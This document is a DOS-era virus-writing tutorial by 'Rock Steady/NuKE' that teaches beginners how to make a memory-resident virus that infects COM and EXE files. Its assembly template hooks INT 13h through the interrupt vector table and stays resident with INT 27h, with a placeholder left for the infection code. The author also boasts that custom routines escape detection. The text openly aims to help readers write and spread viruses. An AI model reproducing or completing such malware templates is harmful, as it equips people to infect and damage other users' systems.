TSR .COM infection
TSR COM infections
By Rock Steady/NuKE
There are several ways to constructed your viruses. Mainly you have those which are RAM-Resident or better known as a TSR program. And with great thought we have those which are not RAM-Resident.
A TSR virus will load into memory and can infect all programs that are executed by the computer. Such like my AmiLiA virus which will infect all EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot faster compared to a Non-Resident Virus. Because a NON-Resident Virus will only infect file each time it is ran. Though the NON-Resident will start off very slowly infecting the system files but after the virus is in the system after a number of weeks, it will certainly infect ALL files that are in the system. Where a TSR virus will USUALLY infect files that are executed. So that only files that are often executed will be infected. But The TSR virus can certainly infect A LOT more files than a Non-Resident JUST on the first Hour! It is out numbered 10 to 1. This is the advantage that all programmers enjoy and program TSR viruses. I will explain a SIMPLE method of making your program a TSR one. And it will be as flexible as you want so that NO ONE can stay you `Stole' this information off Rock Steady.
Anyhow I will explain the simple Process of Intercepting ROM-Bios Interrupts and hooking your virus/Program to any Interrupt of your choice. This method that is being explained is also used ALL the Jerusalem Strains. And several of the Vacsina Strains. They total up to close to 100+ Viruses that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm explaining this method your virus CANNOT be detected because of this TSR routines because there are routines I DEVELOPED ALONE and will soon to be release in one of my future virii. Anyhow there are an UNLIMITED amount of ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER get detected as a virus for all you Beginners. And how this routine can be used in several OTHER utilities not just viruses.
Beginning...
First we must Intercept an Interrupt, Lets say we want our virus to activate Every TIME the disk I/O is being used we would use INT 13h or INT 21h. The INT 13h will activate everytime ANY file is opened or Closed And the INT 21h will activity anytime any file is executed or any INT 21h functions Like a "DIR" in DOS. If you want you can even hooked your virus to INT 10h and it may activate when Graphics are displayed, or you can hook it to the interrupt involved with Printer Functions. Whatever seems to `EnLighten' you, since we live in a Distressed world, I won't even bother why we shouldn't hooked them up to just ANY interrupt.
Anyhow, interrupts use a vector table at the bottom of memory (ROM) to find out what routine in the ROM Bios to call. So the address for Interrupt 21h would be located at 0000:0084 and for Interrupt 13h it would be found at 0000:004Ch. So we can change theses addresses in the vector table. What we do is we change the vector address to POINT to our virus. So everytime the Interrupt is called it goes to the vector table and the table tells it to call our Virus, rather than calling the ROM Bios. But what MUST do FIRST is save the ORIGINAL Interrupt routine and place that somewhere in memory. So that our virus will call the Original ROM Bios routine after executing itself.
Lets say we hooked our Virus to the INT 13h, which controls all Disk Activities. So if our Computer users tries to read something from the disk the Computer will call the INT 13h bios Routines on How To do it. But instead of finding the INT 13h routines it calls our virus, and the Virus gets ran, which then our virus does what it has to do, and then runs the Original INT 13h Routine where-ever it was stored. So it simulates an INT call to the ROM bios routines.
;----------------------------------------------------------------
; Sample Program on how to Hook your virus to an Interrupt call.
;----------------------------------------------------------------
Code Segment
Assume cs:code,ss:code,ds:code,es:code
Org 100h ; Guess this will be a COM file? Huh?
Begin: JMP Bios_Routine
NOP ; This is just a cheap .COM file that the
NOP ; virus is attached to. Remember you should
NOP ; have the first 3 bytes written in your
INT 20h ; virus.
OLD_ROM_INT DD ? ;Our Stack to save the OLD Int Address
;----------------------------------------------------------------
; This Calls the VIRUS and then the simulates the OLD Rom Routine
;----------------------------------------------------------------
Virus_Codes PROC FAR
Assume cs:code, ds:nothing
pushf ; Everytime the ROM-Routine is call this
push ax ; is what happens... Saves the Regesters
push di ; And runs Our Virus... Then it restores
push si ; the regesters and Runs the OLD_ROM Bios
push es ; Routine that was supposed to be ran in
push ds ; the first place...
call The_Virus
pop ds ;NoTe: It's better to SAVE all Regesters and
pop es ; Flags because our Virus WILL ALTER a few
pop si ; And when the Virus leaves control back to the
pop di ; Computer it is EXPECTED to continue where it
pop ax ; It left off...
popf
pushf ; This `pushf' is NEEDED to act like a simulated
call OLD_ROM_INT ; ROM Bios Interrupt call...
ret
Virus_Codes ENDP
;----------------------------------------------------------------
; Put the REAL Virus Codes here...
;----------------------------------------------------------------
The_Virus PROC NEAR
... ; Put your OWN Virus codes here...
... ; Just make it compatible with our
... ; Codes... Try to make it small and
... ; it will take up less space in the
... ; users' memory.
...
... ;NoTe: Try to infect files that are ONLY
... ; Executed! Rather than each time the INT
... ; is used... Get it?
RET
The_Virus ENDP
;---------------------------------------------------------------
; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
; And places a Call to point to our Virus. Which then Calls the
; OLD_ROM Bios Routine. So Remember to SAVE it first.
;---------------------------------------------------------------
Bios_Routine PROC NEAR
Assume cs:code,ds:code
mov ah,35h ; This Asks for the interrupt vector!
mov al,13h ; whatever is in AL is what int vector
int 21h ; address you get and is stored in ES:BX
mov word ptr OLD_ROM_INT,bx ;Save the BX register in our Stack
mov word ptr OLD_ROM_INT[2],es ;And same to the ES Register
; Here you SHOULD put a small routine to check if the Interrupt vector has
; already been changed! For INT 13h this should contain 0000:004Ch the
; formula for this is (Interrupt # times 4) For INT 21h it is (21hx4)=84h
; and so on. So if its been changed it means the virus has already changed
; it! And it `Should' be resident. How ever this is a simple way of doing
; it. but not always the BEST way... Because any program the hooks to the
; virus interrupt will fool the virus to think it is already resident.
; Though this source is NOT for the Professional Virus Programmer like myself
; because WE KNOW! But for those that are half way there...
mov ah,25h ; This asks to set a Interrupt vector address!
mov al,13h ; Interrupt # to be set goes in AL
mov dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
int 21h
mov dx,offset Bios_Routine
int 27h
Bios_Routine ENDP
; Anything after this point will not be memory resident. because the end
; of the resident portion ends at `Bios_Routine' procedure.
Code ENDS
END Begin
;----------------------------- EnD ----------------------------------Simple isn't it? Anyhow I tried to make this as simple as possible. I hope I didn't lose you. Anyhow this is a simple routine that several TSR virii use. Anyhow, see what that gives you....
Rock Steady
NukE / Viral Development Researcher
-PeAcE-
